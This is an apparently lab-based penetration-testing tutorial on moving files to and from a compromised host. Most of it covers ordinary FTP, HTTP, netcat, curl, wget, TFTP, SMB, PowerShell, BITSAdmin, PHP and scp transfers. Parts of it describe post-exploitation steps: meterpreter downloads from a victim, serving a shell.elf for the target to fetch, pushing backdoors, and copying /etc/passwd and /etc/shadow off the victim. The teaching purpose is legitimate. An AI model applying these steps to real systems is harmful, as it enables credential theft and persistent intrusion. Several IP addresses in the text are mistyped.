Comprehensive Guide on File Transfer (Post

Exploitation)
In penetration testing, generally, we get stuck when we transfer or download any file from the
compromised machine or another host machine in a network. Therefore, today you will learn
which method you should follow for downloading any file from compromised or another host
system. All following methods are helpfully in penetration testing and also used for general
purpose.
Let’s start!!
File Transfer Protocol (FTP)
You all are familiar with the working of FTP server their let’s start today’s tutorial from FTP
service.
When you found port 21 is open, it means FTP service is running on a remote machine and you
are actively looking for downloading a text file from destination machine then you can follow
below 2 methods.
1st method use command-line
First, connect to FTP server using host IP, enter login credential and then
execute get command with the file name you want to download.

ftp 192.168.1.106
get raj.txt

www.hackingarticles.in 1 www.ignitetechnologies.in
2nd method use Browser
The same job can be executed using the browser by adding host IP in URL
as ftp://192.168.1.106, enter username and password for authentication and download your
file.

www.hackingarticles.in 2 www.ignitetechnologies.in
Install Python FTP server
Generally, many people preferred vsftpd server for FTP service for sharing a file over port 21 as
done above but if you are not compatible with vsftpd then you can go with 2 nd option “Python
FTP server” that will allow sharing of the file through port 21.

sudo apt-get install python-pyftpdlib

Here I want to give access to only a particular folder “aarti” for sharing its data.

www.hackingarticles.in 3 www.ignitetechnologies.in
 sudo python -m pyftpdlib -p 21

So when the host machine will enter destination address in URL “ftp://192.168.1.103” and you
will get anonymous login, now download the file.

Hypertext Transfer Protocol (HTTP)

Sharing file through web directory “html”
Another most well-known service for file transfer is HTTP service which uses port 80. Service
Apache should be activated in your machine for transferring file through web directories and
after then you can move any file into HTML directory for sharing it through http service.
So here we are transferring the putty.exe file into html through the following command.

cp putty.exe /var/www/html

Now let’s download putty.exe in our machine from the destination server. Open your favorite
browser and browse file through server address 192.168.1.106/putty.exe in URL. By applying
this technique you can access any file from inside web directory i.e. /var/www/html of the
destination machine.

www.hackingarticles.in 4 www.ignitetechnologies.in
Sharing through Python Http server
If you are not compatible with the above http method then you choose 2nd option “Simple Http
server” which also a python script that uses port 80 for sharing a file in a network through web
browser.
Here again, I want to give access to only a particular folder “demo” for sharing its data.

python -m SimpleHTTPServer 80

So when the host machine will enter destination address in URL “http://192.168.1.108” and
you will get access for the shared folder, now download the file.

www.hackingarticles.in 5 www.ignitetechnologies.in
HFS Tool
In the above Http file sharing method we had to use Ubuntu and Linux for transferring a file
over port 80 and allowed another host machine to download it through a web browser.
Now if you are a windows user then you can use HTS tool for performing the same job. It is the
most popular tool used file transfer between different platforms.
Steps:
▪ Download the HFS and run the application
▪ Now drag and drop the file you want to share through the web browser.

www.hackingarticles.in 6 www.ignitetechnologies.in
 Now when the user of another host machine will open Windows IP as
URL http://192.168.1.105 in his web browser he can download the shared file.

Netcat
Netcat is known as Swiss knife which is used for multiple purposes therefore we are going to
use it in file transfer.

www.hackingarticles.in 7 www.ignitetechnologies.in
 Use following command for downloading shared file from destination server
Syntax: nc [options] [listening port] > [path to store downloaded file]

nc -lvp 5555 > /root/Desktop/raj.txt

Type following command for sharing any file to host machine in the network.
Syntax: nc host IP host port < file.txt

nc 192.168.1.108 5555 < raj.txt

Now you can observe that we have successfully downloaded the raj.txt file at the desktop of
our host machine.

Curl
Curl command-line tool for transferring data using various protocols. And is also used for
download the data from any website or host machine, the following command will download
the putty.exe file from the website.

curl -O http://192.168.1.106/putty.exe

Similarly, execute given below command for downloading putty WWW.

curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

Wget

www.hackingarticles.in 8 www.ignitetechnologies.in
 Execute given below command for downloading a particular file. The downloaded file stores in
a current directory. It gives an indication of download progress, size, date and time though
downloading the file.
Enter given below command for downloading any file from html directory of Apache server.

wget http://192.168.1.106/putty.exe

Similarly, execute given below command for downloading putty WWW.

wget https://the.earth.li/~sgtatham/putty/latest/putty.exe

Trivial File Transfer Protocol (TFTP)

TFTP service was used to read and write any file using a remote connection, it used UDP port 69
for sharing file and do not uses authentication hence it is less secure than FTP.
Here I had created a demo.txt file inside the tftp folder for sharing.

Metasploit contain a module that provides TFTP service for file sharing.

use auxiliary/server/tftp
msf auxiliary(server/tftp) > set srvhost 192.168.1.108
msf auxiliary(server/tftp) > set TFTPROOT /root/tftp
msf auxiliary(server/tftp) > exploit

www.hackingarticles.in 9 www.ignitetechnologies.in
 Now open a command prompt and execute given below command for downloading the
demo.txt file in your system.
Syntax: tftp -i host IP GET file name.txt

tftp -i 192.168.1.108 GET demo.txt

As you can observe from given below image it has store downloaded in the current directory.

SMB Server using Python script

Now we will use a python script that activates SMB service in our Linux machine. You can
visit github for this python script.

I copied the python code from Github and past it into a text file as smbserver.py in the desktop
folder. Now execute give below command for a shared folder “raj”.

www.hackingarticles.in 10 www.ignitetechnologies.in
 python smbserver.py raj /root/share

Downloading the file from Linux SMB server in Windows Machine

Since we are aware of smb service which is running in host machine 192.168.1.108 and being
using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user
and pass in it.
In this way, we can use smb python script for sharing file between Windows and Linux machine.

www.hackingarticles.in 11 www.ignitetechnologies.in
Downloading the file from Linux SMB server in Ubuntu Machine
If you are an Ubuntu user then you can use smbclient service for accessing share folder of smb
server.

apt-get install smbclient

Now execute given below command for accessing shared folder of the server.

smbclient -L 192.168.1.108

From given below image can observe it has shown share folder is “RAJ”

Now execute given below command for accessing share folder raj and download the data
present inside it.

smbclient //192.168.1.1.108/raj

Since folder raj has two text file user.txt and pass.txt and we are going to download user.txt
through below command.
get user.txt

Download file through Meterpreter

In penetration testing when we compromise target machine and own his meterpreter session
using Metasploit then inside meterpreter we can execute the following command for
downloading any file from victim’s machine.

www.hackingarticles.in 12 www.ignitetechnologies.in
 meterpreter> download raj.txt /root/Desktop/

Use Cat command

cat is very beautiful command and can perform the remarkable job if you will use it wisely,
suppose you found any text file in host machine and you are unable to download it then open
that file through cat command.
For example, I want to know the text inside user.txt then I will execute the following command
then copy that text into a new text document and save it in our machine.

Download file using Window PowerShell

www.hackingarticles.in 13 www.ignitetechnologies.in
 If you are a windows user and have to command shell access then you can choose PowerShell
for downloading any web server file. Execute given below command in command prompt as
administrator.
PowerShell

(new-object
System.Net.WebClient).DownloadFile('http://192.168.1.1.106/putty.exe',’d:\data\putty.e
xe')

From given below image you can observe we had successfully download putty.exe in d: drive.

Download file using BITSAdmin

BITSAdmin is a command-line utility for window platform that allows the user to download and
uploading of a file. If you want to download any file from http then you can use the following
command. It is similar to PowerShell work under admin privileged. Therefore run cmd as
administrator and execute given below command for downloading putty.

bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe

F:\putty.exe

Now it will start downloading and also gives updates while downloading such as job type i.e
downloading, priority and status.

From given below image you can observe that we had downloaded putty.exe in f: drive.

www.hackingarticles.in 14 www.ignitetechnologies.in
Sharing File through PHP File Server
PHP is also available for the same purpose when the above method is not compatible with
sharing file between two hosts. You need to execute the following command to turn on the
HTTP listener. As you know, I have saved a shell script on the Desktop, therefore, we are
running below command on Desktop.

php -S 0.0.0.0:80

Now you can use wget or other application for downloading shell script from remote address
i.e. 192.168..1.103/shell.elf

SCP File Transfer

Secure copy protocol (SCP) is a means of securely moving any files between a local host and a
remote host or between two remote hosts. It is based on the Secure Shell (SSH). Here I have
created a new file scp.txt inside /home/raaz and then try to transfer this file to a remote
machine with help of the following command.
Syntax: scp SourceFile user@host:~/path of the directory

www.hackingarticles.in 15 www.ignitetechnologies.in
 scp scp.txt aarti@192.168.1.105:~/

Now let’s confirm the transformation by inspecting remote directory and as you can observe
we have successfully received the scp.txt file in our remote pc.
Similarly, we can transfer any backdoor from the attacker machine to victim’s machine or can
copy some system files such as /etc/passwd and /etc/shadow from the victim’s machine.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information
Security Consultant Social Media Lover and Gadgets. Contact here

www.hackingarticles.in 16 www.ignitetechnologies.in